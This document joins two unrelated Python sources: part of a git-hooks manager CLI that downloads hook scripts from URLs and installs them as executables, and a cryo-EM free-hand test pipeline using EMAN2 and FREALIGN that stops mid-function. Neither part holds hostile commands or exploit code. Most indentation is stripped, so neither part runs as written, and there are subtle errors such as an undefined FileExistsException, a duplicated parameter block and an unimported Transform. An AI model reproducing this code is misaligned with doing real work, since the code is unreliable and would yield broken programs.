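# sub_commands = {'hello': Hello}.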
class Init(Base):
description = 'Initialises the hooks repository'
def add_args(self, parser):
parser.add_argument('-y', '--overwrite', help='Silently overwrite existing hooks', action='store_true', dest='overwrite')
parser.add_argument('-n', '--no-overwrite', help='Silently avoid overwriting existing hooks', action='store_true', dest='no_overwrite')
def action(self, args):
if not repo.get().heads:
            logger.error("The hook runner doesn't currently work for new repos. Perform an initial commit before initialising githooks (see: https://github.com/wildfish/git-hooks/issues/4)")
return 1
if args.overwrite and args.no_overwrite:
logger.error('Both the overwrite and no overwrite flags were set')
return 1
init_dir = os.path.join(repo.repo_root(), '.git', 'hooks')
for hook_name in utils.get_hook_names():
src = os.path.join(utils.get_hook_script_dir(), hook_name)
dst = os.path.join(init_dir, hook_name)
if not args.overwrite and os.path.exists(dst):
if args.no_overwrite:
continue
logger.info(u'A "{0}" already exists for this repository. Do you want to continue? y/[N]'.format(hook_name))
c = get_input()
                if c.lower() not in ('y', 'yes'):
continue
shutil.copy(src, dst)
st = os.stat(dst)
os.chmod(dst, st.st_mode | stat.S_IEXEC)
try:
os.mkdir(dst + '.d')
except FileExistsException:
pass
return 0
class Install(Base):
description = 'Installs the selected hook'
def __init__(self, *args, **kwargs):
self._config = None
super(Install, self).__init__(*args, **kwargs)
def add_args(self, parser):
parser.add_argument('hook_type', nargs='?', help='The hook type to install. If no hook is given the config from "githooks.cfg" or "setup.cfg" is used', default=None, choices=utils.get_hook_names())
parser.add_argument('hooks', nargs='*', help='The names/urls for hooks to install')
parser.add_argument('-u', '--upgrade', help='Flag if hooks should be upgraded with the remote version', action='store_true', dest='upgrade')
parser.add_argument('-y', '--yes', help='Flag if all hooks should be installed without prompting', action='store_true', dest='yes')
def action(self, args):
if args.hook_type:
self._install_hooks(args.hook_type, args.hooks, args.upgrade, args.yes)
else:
for hook_type, hooks in self.config.items():
self._install_hooks(hook_type, hooks, args.upgrade, args.yes)
def _name_from_uri(self, uri):
path = urlsplit(uri).path
return posixpath.basename(path)
def _install_hooks(self, hook_name, hooks, upgrade, install_all=False):
type_repo = repo.hook_type_directory(hook_name)
for hook in hooks:
name = self._name_from_uri(hook)
uri = hook
            # check if we need to skip based on the hook already existing
if not upgrade and os.path.exists(os.path.join(type_repo, name)):
logger.info(u'"{0}" is already installed, use "--upgrade" to upgrade the hook to the newest version.'.format(name))
continue
response = requests.get(uri)
# print file content so that it can be checked before installing
if not install_all:
logger.info('## Installing {} from {}'.format(name, uri))
for line in response.content.decode().split('\n'):
logger.info(line)
if not input('Continue? [y/N]: ').lower() in ['y', 'yes']:
logger.info('Not installing {} from {}'.format(name, uri))
continue
# save the hook
logger.info('Installing {} from {}'.format(name, uri))
dst = os.path.join(type_repo, name)
with open(dst, 'wb') as f:
f.write(response.content)
st = os.stat(dst)
os.chmod(dst, st.st_mode | stat.S_IEXEC)
@property
def config(self):
if self._config is None: # pragma: no cover (dont need to cover the caching behaviour)
parser = ConfigParser()
if os.path.exists(os.path.join(repo.repo_root(), 'git-hooks.cfg')):
parser.read(os.path.join(repo.repo_root(), 'git-hooks.cfg'))
self._config = dict(
(k, v.split('\n')) for k, v in parser.items('install')
)
elif os.path.exists(os.path.join(repo.repo_root(), 'setup.cfg')):
parser.read(os.path.join(repo.repo_root(), 'setup.cfg'))
self._config = dict(
(k, v.split('\n')) for k, v in parser.items('git-hooks.install')
)
return self._config
class Uninstall(Base):
    description = 'Uninstalls the selected hooks'
def add_args(self, parser):
parser.add_argument('hook_type', nargs='?', help='The hook type to uninstall.', choices=utils.get_hook_names())
parser.add_argument('hooks', nargs='*', help='The names for hooks to uninstall')
def action(self, args):
type_dir = repo.hook_type_directory(args.hook_type)
for hook in args.hooks:
hook_path = os.path.join(type_dir, hook)
if os.path.exists(hook_path):
os.remove(hook_path)
else:
logger.info('{} hook called "{}" could not be found. SKIPPING.'.format(args.hook_type, hook))
class Hooks(Base):
description = 'Manages your commit hooks for you!'
sub_commands = {
'init': Init,
'install': Install,
'uninstall': Uninstall,
}
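# Typical wiring (sketch): a console-script entry point instantiates the root
# command and hands its status code back to the shell, e.g.
#
#     import sys
#     sys.exit(Hooks('hooks').run())
#
# run() parses argv, dispatches to the selected sub command and returns the
# action's status code.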
|
|
#!/usr/bin/env python
import glob
import linecache
import math
import optparse
import os
import re
import subprocess
import sys
import time
import numpy as np
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
#=========================
def setupParserOptions():
parser = optparse.OptionParser()
parser.set_usage("%prog -u <untilted stack> -m <model> -p <parameter file>")
parser.add_option("-u",dest="untilted",type="string",metavar="FILE",
help="untilted stack (white particles in IMAGIC format)")
parser.add_option("-t",dest="tilted",type="string",metavar="FILE",
help="tilted stack (black particles in IMAGIC format)")
parser.add_option("-m",dest="model",type="string",metavar="FILE",
help="3D model(s) for alignment (Single SPIDER volume or multi-volume HDF file)")
parser.add_option("-p",dest="param",type="string", metavar="FILE",
help="Parameter file with refinement info (free_param.par)")
parser.add_option("-c",dest="ctf",type="string",metavar="FILE",
help="CTF-information file for tilted particles")
parser.add_option("-a",action="store_true",dest="appion",default=False,
help="Flag if CTF-info comes from APPION")
parser.add_option("-d", action="store_true",dest="debug",default=False,
help="debug")
options,args = parser.parse_args()
if len(args) > 0:
parser.error("Unknown commandline options: " +str(args))
if len(sys.argv) < 2:
parser.print_help()
sys.exit()
params={}
for i in parser.option_list:
if isinstance(i.dest,str):
params[i.dest] = getattr(options,i.dest)
return params
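#=========================
# Example invocation (file names are illustrative, nothing here ships with the
# script):
#
#   python thisScript.py -u untilted.img -t tilted.img -m model.hdf \
#       -p free_param.par -c tilted_ctf.par
#
# Add -a when the CTF file comes from APPION and -d for debug output.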
#=========================
def checkConflicts(params):
if not params['untilted']:
print "\nWarning: no untilted stack specified\n"
elif not os.path.exists(params['untilted']):
print "\nError: stack file '%s' does not exist\n" % params['untilted']
sys.exit()
if not params['tilted']:
print "\nWarning: no tilted stack specified\n"
elif not os.path.exists(params['tilted']):
print "\nError: stack file '%s' does not exist\n" % params['tilted']
sys.exit()
if not params['model']:
print "\nWarning: no model specified\n"
elif not os.path.exists(params['model']):
print "\nError: model file '%s' does not exist\n" % params['model']
sys.exit()
if not params['param']:
print "\nError: no free_param.par file specified"
sys.exit()
if not os.path.isfile(params['param']):
print "\nError: free_param.par file does not exist\n"
sys.exit()
    if not params['ctf'] or not os.path.isfile(params['ctf']):
        print "\nError: CTF-information file for the tilted stack was not found\n"
        sys.exit()
if os.path.exists('refine_eman2'):
print "\nOutput folder already exists, remove refine_eman2 and start again\n"
sys.exit()
s = params['untilted']
prep = '%s_prep.img' %(s[:-4])
if os.path.exists(prep):
os.remove(prep)
os.remove('%s.hed' %(prep[:-4]))
if os.path.exists('start.hdf'):
os.remove('start.hdf')
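#=========================
# The layout of free_param.par is not defined in this script; it is only
# grep'd for keyword lines, and the third whitespace-separated token of each
# matching line is taken as the value. An illustrative sketch consistent with
# that parsing (all values are made up):
#
#   angular = 15
#   shift = 8
#   ts = 2
#   pix = 1.63
#   radius = 80
#   snr = 0.07
#   boxSize = 160
#   num_part = 5000
#   cs = 2.0
#   volt = 120
#   freeHand_ang_search = 60
#   min_res = 300
#   max_res = 15
#   first = 1
#   last = 5000
#   incr = 8
#   mag = 50000
#   num_mod = 1
#   cutoff = 0.5
#   calc = C
#   tilt_ang = -55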
#========================
def file_len(fname):
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
#========================
def getEMANPath():
### get the imagicroot directory
emanpath = subprocess.Popen("env | grep EMAN2DIR", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if emanpath:
emanpath = emanpath.replace("EMAN2DIR=","")
if os.path.exists(emanpath):
return emanpath
print "EMAN2 was not found, make sure eman2/2.05 is in your path"
sys.exit()
#===========================
def getMYAMI():
myamipath = subprocess.Popen("env | grep MYAMI", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if myamipath:
myamipath = myamipath.replace("MYAMI=","")
if os.path.exists(myamipath):
return myamipath
print "myami was not found, make sure myami is loaded"
sys.exit()
#========================
def getOPENMPIPath():
### get the openmpi directory
openpath = subprocess.Popen("env | grep MPIHOME", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
test = openpath.find('imagic')
if test >= 0:
print "OPENMPI is not loaded, make sure it is in your path"
sys.exit()
    if test == -1:
if openpath:
openpath = openpath.replace("MPIHOME=","")
if os.path.exists(openpath):
return openpath
print "OPENMPI is not loaded, make sure it is in your path"
sys.exit()
#==========================
def getCCP4Path():
### get the openmpi directory
ccp4path = subprocess.Popen("env | grep CCP4_PATH", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if ccp4path:
ccp4path = ccp4path.replace("CCP4_PATH=","")
if os.path.exists(ccp4path):
return ccp4path
print "ccp4 is not loaded, make sure it is in your path"
sys.exit()
#========================
def grep(string,list):
expr = re.compile(string)
for text in list:
match = expr.search(text)
if match != None:
return match.string
#========================
def Eman2Freali(az,alt,phi):
t1 = Transform({"type":"eman","az":az,"alt":alt,"phi":phi,"mirror":False})
d = t1.get_params("eman")
psi = d["phi"]+90
if psi >360:
psi = psi-360
theta= d["alt"]
phi = d["az"]-90
return psi,theta,phi
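#========================
# Rough numeric sketch, assuming EMAN2's Transform hands back the same
# az/alt/phi it was given: Eman2Freali(az=10, alt=20, phi=30) would return
# (psi, theta, phi) = (120, 20, -80), i.e. phi+90, alt and az-90, with psi
# wrapped back into [0, 360) when it exceeds 360.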
#========================
def align(params,cwd):
debug = params['debug']
param = params['param']
untilt = params['untilted']
model = params['model']
#Get parameter info: angular step
p = open(param,'r')
a = 'angular'
angl = grep(a,p)
aL = angl.split()
ang = aL[2]
#Shift
s = 'shift'
p = open(param,'r')
shi = grep(s,p)
sh = shi.split()
sx = sh[2]
#Pixel size
p13 = open(param,'r')
pixel = 'pix'
pixe = grep(pixel,p13)
pi = pixe.split()
pix = pi[2]
#Radius
r = 'radius'
p = open(param,'r')
radiu = grep(r,p)
radi = radiu.split()
rad = radi[2]
p2 = open(param,'r')
#SNR
n = 'snr'
nr = grep(n,p2)
rn = nr.split()
snr = rn[2]
p3 = open(param,'r')
#ts
ts1 = 'ts'
ts2 = grep(ts1,p3)
ts3 = ts2.split()
ts = ts3[2]
#Box size
p4 = open(param,'r')
bxsz = 'boxSize'
bxs = grep(bxsz,p4)
bx = bxs.split()
box = bx[2]
p5 = open(param,'r')
#Number of particles
nmpts = 'num_part'
nmpt = grep(nmpts,p5)
nmp = nmpt.split()
tot = nmp[2]
#CS
p6 = open(param,'r')
cs1 = 'cs'
cs2 = grep(cs1,p6)
cs3 = cs2.split()
cs = cs3[2]
#Accelerating voltage
p7 = open(param,'r')
v1 = 'volt'
v2 = grep(v1,p7)
v3 = v2.split()
volt = v3[2]
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
angSearch = fs3[2]
#Free hand Low resolution
p9 = open(param,'r')
mr1 = 'min_res'
mr2 = grep(mr1,p9)
mr3 = mr2.split()
min_res = mr3[2]
#Free hand Max resolution
p10 = open(param,'r')
    mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand first particle
p11 = open(param,'r')
fir1 = 'first'
fir2 = grep(fir1,p11)
fir3 = fir2.split()
first = fir3[2]
#Free hand last particle
p12 = open(param,'r')
ls1 = 'last'
ls2 = grep(ls1,p12)
ls3 = ls2.split()
last = ls3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand increment
p13 = open(param,'r')
inc1 = 'incr'
inc2 = grep(inc1,p13)
inc3 = inc2.split()
incr = inc3[2]
    #Magnification
p14 = open(param,'r')
m1 = 'mag'
m2 = grep(m1,p14)
m3 = m2.split()
mag = m3[2]
    #Number of models
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
p17 = open(param,'r')
pp1 = 'cutoff'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
cutoff = pp3[2]
p18 = open(param,'r')
pp1 = 'calc'
    pp2 = grep(pp1,p18)
pp3 = pp2.split()
calc = pp3[2]
#Prepare stack for EMAN2 refinement
print '\n'
print 'Converting stack into EMAN2 format'
print '\n'
#Filter particles to specified resolution limits
cmd = 'proc2d %s %s_prep.img apix=%s hp=%s lp=%s' %(untilt,untilt[:-4],pix,min_res,max_res)
subprocess.Popen(cmd,shell=True).wait()
cmd = '%s/up_head.py %s_prep.img %s' %(cwd,untilt[:-4],pix)
subprocess.Popen(cmd,shell=True).wait()
#Run refinement
print '\n'
print 'Running EMAN2 refinement'
print ' Angular step = %s' %(ang)
print ' Shift range = %s' %(sx)
print ' Shift step size (ts) = %s' %(ts)
print ' Pixel Size = %s' %(pix)
print ' Radius = %s' %(rad)
print ' SNR = %s' %(snr)
print ' CC_cut = %s' %(cutoff)
print '\n'
if num_mod == 1:
cmd = 'mpirun -np 8 %s/refine.py start.hdf %s refine_eman2 --ou=%s --rs=1 --xr=%s --ts=%s --delta=%s --snr=%s --center=0 --maxit=1 --ref_a=S --sym=c1 --cutoff=%s --MPI --full_output' %(cwd,model,rad,sx,ts,ang,snr,cutoff)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
else:
cmd = 'mpirun -np 8 %s/refine.py start.hdf %s refine_eman2 --ou=%s --rs=1 --xr=%s --ts=%s --delta=%s --snr=%s --center=0 --maxit=1 --ref_a=S --sym=c1 --cutoff=%s --MPI --full_output --sort' %(cwd,model,rad,sx,ts,ang,snr,cutoff)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
#Clean up:
cmd = 'rm logfile* start.hdf %s_prep.*' %(untilt[:-4])
subprocess.Popen(cmd,shell=True).wait()
def eman2_sort(paramout,tilt,ctf,num_mod,debug):
if debug is True:
print 'eman2_sort():'
print ' paramout = %s; tilt=%s; ctf=%s; num_mod=%s; debug=%s' %(paramout,tilt,ctf,num_mod,debug)
#Sort particles by model(s)
if int(num_mod) == 1:
if debug is True:
print 'num_mod == 1'
param=open(paramout,'r')
count=1
text='%s_%02d.txt' %(tilt[:-4],0)
c_o = '%s_model00.par' %(ctf[:-4])
o1 = open(c_o,'w')
y_o = '%s_model00' %(paramout)
y1 = open(y_o,'w')
text=open(text,'w')
for line in param:
l=line.split()
member=float(l[5])
if debug is True:
print l
if member == 999:
text.write("%s\n" %(count-1))
c = linecache.getline(ctf,count)
y1.write('%s %s' %(str(count),line))
o1.write('%s' %(c))
count=count+1
text.close()
param.close()
cmd="proc2d %s %s_%02d.img list=%s_%02d.txt" %(tilt,tilt[:-4],0,tilt[:-4],0)
subprocess.Popen(cmd,shell=True).wait()
else:
for n in range(0,int(num_mod)):
param=open(paramout,'r')
c_o = '%s_model%02d.par' %(ctf[:-4],n)
o1 = open(c_o,'w')
count=1
y_o = '%s_model%02d' %(paramout,n)
y1 = open(y_o,'w')
text='%s_%02d.txt' %(tilt[:-4],n)
text=open(text,'w')
for line in param:
l=line.split()
member=float(l[5])
if member == n:
text.write("%s\n" %(count-1))
c = linecache.getline(ctf,count)
y1.write('%s' %(line))
o1.write('%s' %(c))
count=count+1
text.close()
param.close()
cmd="proc2d %s %s_%02d.img list=%s_%02d.txt " %(tilt,tilt[:-4],n,tilt[:-4],n)
subprocess.Popen(cmd,shell=True).wait()
def eman2_angConv(paramout,num_mod,ctf,mag,model,tilt,debug):
mod_count = 0
while mod_count < int(num_mod):
print 'Working on model %s' %(mod_count)
print '\n'
print 'Converting files into free-hand format'
print '\n'
parm='%s_model%02d' %(paramout,mod_count)
if debug is True:
print 'parm = %s' %(parm)
f=open(parm,'r')
out = open("%s_freeHand"%(parm),'w')
        count=1
for line in f:
l = line.split()
if debug is True:
print l
parmPSI = float(l[0])
parmTHETA = float(l[1])
parmPHI = float(l[2])
sx =(float(l[3]))
sy =(float(l[4]))
model1 = float(l[5])
#Convert euler angles from EMAN2 to FREALIGN/SPIDER convention
if debug is True:
print 'parmPSI = %s parmTHETA = %s parmPHI = %s ' %(parmPSI,parmTHETA,parmPHI)
psi,theta,phi = Eman2Freali(parmPSI,parmTHETA,parmPHI)
out.write("%s %s %s %s %s %s\n"%(psi,theta,phi,sx,sy,model1))
f.close()
out.close()
makeFH_eman2('%s_freeHand' %(parm),'%s_model%02d.par' %(ctf[:-4],int(mod_count)),mag,1,debug)
eman2_mods(num_mod,model,mod_count,debug)
im_to_mrc('%s_%02d.img' %(tilt[:-4],mod_count),debug)
mod_count = mod_count + 1
#=================
def im_to_mrc(stack,debug):
#Convert tilted particles to 3D-MRC format
# get box size
im=EMData.read_images(stack,[0])
nx = im[0].get_xsize()
del im
nimg = EMUtil.get_image_count(stack)
img = EMData(nx,nx,nimg)
img.write_image(stack[:-4]+'.mrc')
i = 0
while i < nimg:
d = EMData()
d.read_image(stack, i)
region = Region(0, 0, i, nx, nx, 1)
d.write_image(stack[:-4]+".mrc",0,EMUtil.get_image_ext_type("mrc"), False, region, EMUtil.EMDataType.EM_FLOAT, True)
i = i + 1
#============
def eman2_mods(num_mod,model,mod_count,debug):
#Convert model from HDF to MRC
if debug is True:
print num_mod
print model
print mod_count
if int(num_mod) > 1:
cmd = 'e2proc3d.py --first=%s --last=%s %s %s_%03d.mrc' %(mod_count, mod_count,model,model[:-4],mod_count)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
else:
cmd = 'proc3d %s %s_%03d.mrc' %(model,model[:-4],int(mod_count))
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
#==================
def makeFH_eman2(f,c,mag,div,debug):
#Convert parameter file format with CTF info
f1 = open(f,'r')
fout = '%s_format.par' %(f[:-4])
o1 = open(fout,'a')
if debug is True:
print 'c = %s' %(c)
o1.write("C Frealign format parameter file created from Search_fspace parameter file\n")
o1.write("C\n")
o1.write("C PSI THETA PHI SHX SHY MAG FILM DF1 DF2 ANGAST CCMax\n")
count = 1
for line in f1:
l = line.split()
if debug is True:
print line
psi = float(l[0])
theta = float(l[1])
phi = float(l[2])
shiftx = float(l[3])/float(div)
shifty = float(l[4])/float(div)
ctf2 = linecache.getline(c,count)
ctf = ctf2.split()
df1 = float(ctf[0])
df2 = float(ctf[1])
astig = float(ctf[2])
o1.write("%7d%8.3f%8.3f%8.3f%8.3f%8.3f%8.0f%6d%9.1f%9.1f%8.2f%7.2f\n" %(count,psi,theta,phi,shiftx,shifty,float(mag),1,df1,df2,astig,50))
count = count + 1
o1.write("C\n")
#=========
def eman2_conv(params,cwd):
param = params['param']
#Get parameter info: number of models
p = open(param,'r')
a = 'num_mod'
angl = grep(a,p)
aL = angl.split()
num_mod = aL[2]
#Get parameter info: mag
p = open(param,'r')
a = 'mag'
angl = grep(a,p)
aL = angl.split()
mag = aL[2]
p = open(param,'r')
a = 'angular'
angl = grep(a,p)
aL = angl.split()
ang = aL[2]
tilt = params['tilted']
ctf = params['ctf']
debug = params['debug']
model = params['model']
paramout = 'refine_eman2/paramout_%03d_00' %(float(ang))
#Sort particles based up membership to model(s)
eman2_sort(paramout,tilt,ctf,num_mod,debug)
#Convert euler angles, model, and particles from EMAN2 to FREALIGN for each model
eman2_angConv(paramout,num_mod,ctf,mag,model,tilt,debug)
#Clean up
mod = 0
while mod < int(num_mod):
cmd = 'rm %s_model%02d %s_model%02d_freeHand %s_model%02d.par %s_%02d.img %s_%02d.hed %s_%02d.txt' %(paramout,mod,paramout,mod,ctf[:-4],mod,tilt[:-4],mod,tilt[:-4],mod,tilt[:-4],mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
mod = mod + 1
def fastFree_run(params,cwd,mod):
debug = params['debug']
param = params['param']
stack = params['tilted']
model = params['model']
#Pixel size
p13 = open(param,'r')
pixel = 'pix'
pixe = grep(pixel,p13)
pi = pixe.split()
pix = pi[2]
#Radius
r = 'radius'
p = open(param,'r')
radiu = grep(r,p)
radi = radiu.split()
rad = radi[2]
p2 = open(param,'r')
#SNR
n = 'snr'
nr = grep(n,p2)
rn = nr.split()
snr = rn[2]
#CS
p6 = open(param,'r')
cs1 = 'cs'
cs2 = grep(cs1,p6)
cs3 = cs2.split()
cs = cs3[2]
#Accelerating voltage
p7 = open(param,'r')
v1 = 'volt'
v2 = grep(v1,p7)
v3 = v2.split()
volt = v3[2]
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
angSearch = fs3[2]
#Free hand Low resolution
p9 = open(param,'r')
mr1 = 'min_res'
mr2 = grep(mr1,p9)
mr3 = mr2.split()
min_res = mr3[2]
#Free hand Max resolution
p10 = open(param,'r')
    mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand first particle
p11 = open(param,'r')
fir1 = 'first'
fir2 = grep(fir1,p11)
fir3 = fir2.split()
first = fir3[2]
#Free hand last particle
p12 = open(param,'r')
ls1 = 'last'
ls2 = grep(ls1,p12)
ls3 = ls2.split()
last = ls3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand increment
p13 = open(param,'r')
inc1 = 'incr'
inc2 = grep(inc1,p13)
inc3 = inc2.split()
procs = inc3[2]
    #Magnification
p14 = open(param,'r')
m1 = 'mag'
m2 = grep(m1,p14)
m3 = m2.split()
mag = m3[2]
    #Number of models
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
p17 = open(param,'r')
pp1 = 'cutoff'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
cutoff = pp3[2]
p18 = open(param,'r')
pp1 = 'calc'
    pp2 = grep(pp1,p18)
pp3 = pp2.split()
calc = pp3[2]
p18 = open(param,'r')
pp1 = 'angular'
pp2 = grep(pp1,p18)
pp3 = pp2.split()
ang = pp3[2]
#Number of particles
ctf = 'refine_eman2/paramout_%03d_00_model%02d_free_format.par' %(float(ang),mod)
y = open(ctf,'r')
tot = len(y.readlines())
tot = tot - 4
if debug is True:
print tot
#Run Free-Hand test
#Create ctf param info
numParts = 0
dfCount = 0
df = 0
counter = 1
ctfInfo = open(ctf)
for line in ctfInfo:
l = line.split()
if l[0] == 'C':
continue
if debug is True:
print l
df1 = float(l[8])
df2 = float(l[9])
astig = float(l[10])
if counter > 1:
if counter < tot:
if df != df1:
try:
ctfEXE
except NameError:
ctfEXE = None
if ctfEXE is None:
ctfEXE = '%s,%s,1,%s,%s,%s,1\n' %(dfCount,mag,df1,df2,astig)
else:
ctfEXE += '%s,%s,1,%s,%s,%s,1\n' %(dfCount,mag,df1,df2,astig)
df = df1
dfCount = 0
if counter == tot:
dfCount = dfCount + 1
ctfEXE += '%s,%s,1,%s,%s,%s,0\n' %(dfCount,mag,df1,df2,astig)
if counter == 1:
df = df1
dfCount = dfCount + 1
counter = counter + 1
i = 1
iteration = 1
incr = str(round(tot/int(procs))+1)
if debug is True:
print ctfEXE
#Setup inputs for free-hand executable
cmd = 'cp %s/fastfreehand_v1_01.exe .' %(cwd)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
exe = 'fastfreehand_v1_01.exe\n'
p1 = '%s,%s,%s,%s\n' %(pix,snr,cs,volt)
p2 = '1,0\n'
p3 = '%s_%02d.mrc\n' %(stack[:-4],mod)
p4 = '%s_%03d.mrc\n' %(model[:-4],mod)
p5 = '%s\n' %(ctf)
#p6 = plots_.mrc (see below)
p7 = '-%s,%s,-%s,%s\n' %(angSearch,angSearch,angSearch,angSearch)
p8 = '%s,%s,%s\n' %(min_res,max_res,str(float(pix)*float(rad)))
#p9 = first, last (see below)
p10 = '%s\n' %(calc)
while i < int(tot):
last = str(i + float(incr)-1)
last = last[:-2]
if i == 1:
first = str(i)
else:
first = str(i)
first = first[:-2]
if float(last) > int(tot):
incr = int(incr[:-2]) - (int(last)- int(tot))
last = str(tot)
p6 = 'model%02d_plots_CC_v101_%02d.mrc\n' %(mod,iteration)
p9 = '%s,%s\n' %(first,last)
ff_cmd ='#!/bin/csh\n'
ff_cmd +='fastfreehand_v1_01.exe << eot\n'
ff_cmd +=p1
ff_cmd +=p2
ff_cmd +=p3
ff_cmd +=p4
ff_cmd +=p5
ff_cmd +=p6
ff_cmd +=p7
ff_cmd +=p8
ff_cmd +=p9
ff_cmd +=p10
ff_cmd +=ctfEXE
ff_cmd +='eot\n'
ff_cmd +='touch iteration%01d_finished\n' %(iteration)
tmp = open('tmp%01d.csh'%(iteration),'w')
tmp.write(ff_cmd)
tmp.close()
cmd = 'chmod +x tmp%01d.csh' %(iteration)
subprocess.Popen(cmd,shell=True).wait()
cmd = './tmp%01d.csh' %(iteration)
subprocess.Popen(cmd,shell=True)
i = i + float(incr)
iteration = iteration + 1
iteration = iteration - 1
return iteration
def fastFree(params,cwd):
param = params['param']
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
mod = 1
while mod <= num_mod:
mod = mod -1
iteration = fastFree_run(params,cwd,mod)
wait(params,iteration)
mod = mod + 2
#===========
def wait(params,iteration):
param = params['param']
debug = params['debug']
i = 1
while i<= iteration:
test = os.path.isfile('iteration%01d_finished'%(i))
if test is False:
time.sleep(5)
if test is True:
i = i + 1
if debug is True:
print 'Free-hand test completed for all particles'
#Clean up:
cmd = 'rm iteration?_finished tmp* fastfreehand_v1_01.exe'
subprocess.Popen(cmd,shell=True)
#==============
def findPeak(stack,peakfile):
if os.path.exists(peakfile):
os.remove(peakfile)
out = open(peakfile,'w')
stackRead = mrc.read(stack)
number, ydim, xdim = stackRead.shape
for i in range(number):
image = stackRead[i,:,:]
output = peakfinder.findPixelPeak(image, guess=None, limit=None, lpf=None)
coord = output['pixel peak']
out.write('%d %s %s\n' %(i,coord[0],coord[1]))
return out
#==============
def averageStack(stackfile,avgfile):
a = mrc.read(stackfile)
a = np.sum(a,axis=0)
a = (a-a.min())/(a.max()-a.min())
mrc.write(a,avgfile)
return avgfile
#===============
def scatter(data,lim,tilt,include):
tiltX = tilt[0]
tiltY = tilt[1]
loadData = np.loadtxt(data)
x = loadData[:,2]
y = loadData[:,1]
#Center peak vales at (0,0)
centx = np.subtract(x,float(lim))
centy = np.subtract(y,float(lim))
#Calculate distance of peaks from expected angle
dist = []
for i in xrange(len(loadData[:,1])):
rx = centx[i]
ry = centy[i]
distance = math.sqrt(((rx - tiltX)*(rx - tiltX)) + ((ry - tiltY)*(ry - tiltY))/2)
dist.append(distance)
newDist = sorted(dist)
    numReadLines = int(round((float(include)/100)*len(loadData[:,1])))
includeRadius = []
for j in xrange(numReadLines):
includeRadius = newDist[j]
#Create function for plotting circle
theta = np.linspace(0,2*math.pi)
incRadx = includeRadius*pylab.cos(theta)
incRady = includeRadius*pylab.sin(theta)
incRadx = pylab.add(incRadx,tiltX)
incRady = pylab.add(incRady,tiltY)
#Set radii for concentric circles
rad1 = 10
rad2 = 20
rad3 = 30
rad4 = 40
rad5 = 50
rad6 = 60
#Create x,y coords for concentric cricles
cx1 = rad1*pylab.cos(theta)
cy1 = rad1*pylab.sin(theta)
cx2 = rad2*pylab.cos(theta)
cy2 = rad2*pylab.sin(theta)
cx3 = rad3*pylab.cos(theta)
cy3 = rad3*pylab.sin(theta)
cx4 = rad4*pylab.cos(theta)
cy4 = rad4*pylab.sin(theta)
cx5 = rad5*pylab.cos(theta)
cy5 = rad5*pylab.sin(theta)
cx6 = rad6*pylab.cos(theta)
cy6 = rad6*pylab.sin(theta)
#Create axes
line1 = np.linspace(-60,60,100)
#Create zeros array
line2 = []
i = 1
while i <= 100:
line2.append('0')
i = i + 1
fig = plt.figure(1)
scatter = plt.subplot(111,aspect='equal')
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
scatter.set_xlabel('Tilt direction (degrees)',fontsize=15)
scatter.set_ylabel('Tilt direction (degrees)',fontsize=15)
scatter.set_title('%d'%(include) + '% ' + 'of particles are within %d degrees of expected angle'%(round(includeRadius)))
scatter.plot(cx1,cy1,c = 'k')
scatter.plot(cx2,cy2,c = 'k')
scatter.plot(cx3,cy3,c = 'k')
scatter.plot(cx4,cy4,c = 'k')
scatter.plot(cx5,cy5,c = 'k')
scatter.plot(cx6,cy6,c = 'k')
scatter.plot(cx5,cy5,c = 'k')
scatter.plot(incRadx,incRady,c = 'r')
scatter.plot(line2,line1,c='k')
scatter.plot(line1,line2,c='k')
scatter.scatter(centx,centy,marker='+',c='k',edgecolor='k',s=55)
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
scatter.xaxis.set_major_locator(majorLocator)
scatter.xaxis.set_major_formatter(majorFormatter)
scatter.xaxis.set_minor_locator(minorLocator)
scatter.yaxis.set_major_locator(majorLocator)
scatter.yaxis.set_major_formatter(majorFormatter)
scatter.yaxis.set_minor_locator(minorLocator)
lim1 = -float(lim)
plt.xlim(lim1,float(lim))
plt.ylim(lim1,float(lim))
outFILE = '%s.png' %(data[:-4])
plt.savefig(outFILE,dpi=150,format='png')
#===========
def plotFH(params,ccp4_path,cwd):
param = params['param']
debug = params['debug']
model = params['model']
stack = params['tilted']
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
